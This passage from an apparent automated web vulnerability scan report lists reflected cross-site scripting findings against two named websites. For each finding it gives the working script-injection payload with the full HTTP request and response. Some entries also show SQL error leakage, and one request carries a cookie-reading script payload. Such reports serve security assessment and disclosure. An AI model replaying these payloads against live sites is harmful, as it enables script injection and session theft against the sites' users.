This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/images2ebed"><script>alert(1)</script>9fb83843369/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16565


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/images2ebed"><script>alert(1)</script>9fb83843369/dubai-expert.jpg" onSubmit="return checkEmail(this);">
...[SNIP]...

3.138. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6583"><script>alert(1)</script>83968344e4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/images/dubai-expert.jpgf6583"><script>alert(1)</script>83968344e4f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:56 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16565


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/images/dubai-expert.jpgf6583"><script>alert(1)</script>83968344e4f" onSubmit="return checkEmail(this);">
...[SNIP]...

3.139. http://www.caribbean-ocean.com/enq.php/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /enq.php/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c944c"><script>alert(1)</script>c1f9a991763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enq.php/stylesheet.cssc944c"><script>alert(1)</script>c1f9a991763 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16556


<html><head>
<title>CaribbeanOcean Enquiry</title>
<meta name="author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<FORM method="post" action="/enq.php/stylesheet.cssc944c"><script>alert(1)</script>c1f9a991763" onSubmit="return checkEmail(this);">
...[SNIP]...

3.140. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 61f95<a>a0264480a25 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=5265261f95<a>a0264480a25 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:17:32 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 848
Content-Type: image/jpg

1054: Unknown column '5265261f95' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 5265261f95<a>a0264480a25</textarea>
Warning: mysql_num_
...[SNIP]...

3.141. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5489f<a>e321fa70c32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=5/5489f<a>e321fa70c322652 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:48 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 844
Content-Type: image/jpg

1054: Unknown column '5489f' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 5/5489f<a>e321fa70c322652</textarea>
Warning: mysql_num_rows
...[SNIP]...

3.142. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload fb1ab><script>alert(1)</script>d76d00b9711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/%22%20stYlefb1ab><script>alert(1)</script>d76d00b9711=%22x:expre/**/images/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:33 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37032


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/" stYlefb1ab><script>alert(1)</script>d76d00b9711="x:expre/**/images/aus-spec.gif" onsubmit="return checkForm(this);">
...[SNIP]...

3.143. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f49f4"><script>alert(1)</script>426e31d6add was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/f49f4"><script>alert(1)</script>426e31d6add=%22x:expre/**/images/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37026


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/f49f4"><script>alert(1)</script>426e31d6add="x:expre/**/images/aus-spec.gif" onsubmit="return checkForm(this);">
...[SNIP]...

3.144. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 5bcea><script>alert(1)</script>e29d7a87e54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/%22%20stYle5bcea><script>alert(1)</script>e29d7a87e54=%22x:expre/**/images/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:28:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37036


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/" stYle5bcea><script>alert(1)</script>e29d7a87e54="x:expre/**/images/dubai-expert.jpg" onsubmit="return checkForm(this);">
...[SNIP]...

3.145. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4754c"><script>alert(1)</script>177af1120f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/4754c"><script>alert(1)</script>177af1120f5=%22x:expre/**/images/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:28:11 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37030


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/4754c"><script>alert(1)</script>177af1120f5="x:expre/**/images/dubai-expert.jpg" onsubmit="return checkForm(this);">
...[SNIP]...

3.146. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload e6e76><script>alert(1)</script>0808859b3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/%22%20stYlee6e76><script>alert(1)</script>0808859b3b7=%22x:expre/**/stylesheet.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:49 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37027


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/" stYlee6e76><script>alert(1)</script>0808859b3b7="x:expre/**/stylesheet.css" onsubmit="return checkForm(this);">
...[SNIP]...

3.147. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331fa"><script>alert(1)</script>5e831a0ec97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/331fa"><script>alert(1)</script>5e831a0ec97=%22x:expre/**/stylesheet.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:27:51 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37021


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/331fa"><script>alert(1)</script>5e831a0ec97="x:expre/**/stylesheet.css" onsubmit="return checkForm(this);">
...[SNIP]...

3.148. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/images/aus-spec.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ea5"><script>alert(1)</script>ca4cb90b998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/images66ea5"><script>alert(1)</script>ca4cb90b998/aus-spec.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:08 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37013


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/images66ea5"><script>alert(1)</script>ca4cb90b998/aus-spec.gif" onsubmit="return checkForm(this);">
...[SNIP]...

3.149. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/images/aus-spec.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299cc"><script>alert(1)</script>2a8489d5ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/images/aus-spec.gif299cc"><script>alert(1)</script>2a8489d5ca HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:21:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37012


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/images/aus-spec.gif299cc"><script>alert(1)</script>2a8489d5ca" onsubmit="return checkForm(this);">
...[SNIP]...

3.150. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dbc"><script>alert(1)</script>c0d8ae38156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/images70dbc"><script>alert(1)</script>c0d8ae38156/dubai-expert.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37017


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/images70dbc"><script>alert(1)</script>c0d8ae38156/dubai-expert.jpg" onsubmit="return checkForm(this);">
...[SNIP]...

3.151. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/images/dubai-expert.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba93"><script>alert(1)</script>ee22e77bfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/images/dubai-expert.jpgdba93"><script>alert(1)</script>ee22e77bfa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:21:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37016


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/images/dubai-expert.jpgdba93"><script>alert(1)</script>ee22e77bfa" onsubmit="return checkForm(this);">
...[SNIP]...

3.152. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /get-in-touch.php/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 184fe"><script>alert(1)</script>67eb97766fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-in-touch.php/stylesheet.css184fe"><script>alert(1)</script>67eb97766fc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:20:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 37008


<html><head>
<title>Contact CaribbeanOcean</title>
<meta name="Author" content="Luxury Caribbean Holidays, Luxury Caribbean Ocean, Exclusive Holidays, Tailor Made Holidays, Caribbean Holidays, Holida
...[SNIP]...
<form name="searchform" method="POST" action="/get-in-touch.php/stylesheet.css184fe"><script>alert(1)</script>67eb97766fc" onsubmit="return checkForm(this);">
...[SNIP]...

3.153. http://www.digitalbond.com/2008/07/20/managing-your-security-career/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /2008/07/20/managing-your-security-career/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f595"><script>alert(1)</script>67a759c718b was submitted in the REST URL parameter 4. This input was echoed as 5f595\"><script>alert(1)</script>67a759c718b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/07/20/managing-your-security-career5f595"><script>alert(1)</script>67a759c718b/ HTTP/1.1
Host: www.digitalbond.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:48:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: PHPSESSID=cd277af27ac294790ba207472b962185; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 19:48:26 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595\"><script>alert(1)</script>67a759c718b/?_login=a40ad20280">
...[SNIP]...

3.154. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e96"><script>alert(1)</script>5199d6c8bfe was submitted in the REST URL parameter 1. This input was echoed as 68e96\"><script>alert(1)</script>5199d6c8bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content68e96"><script>alert(1)</script>5199d6c8bfe/plugins/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:06:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=744fbeec667a873f425670576c466efb; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:06:40 GMT
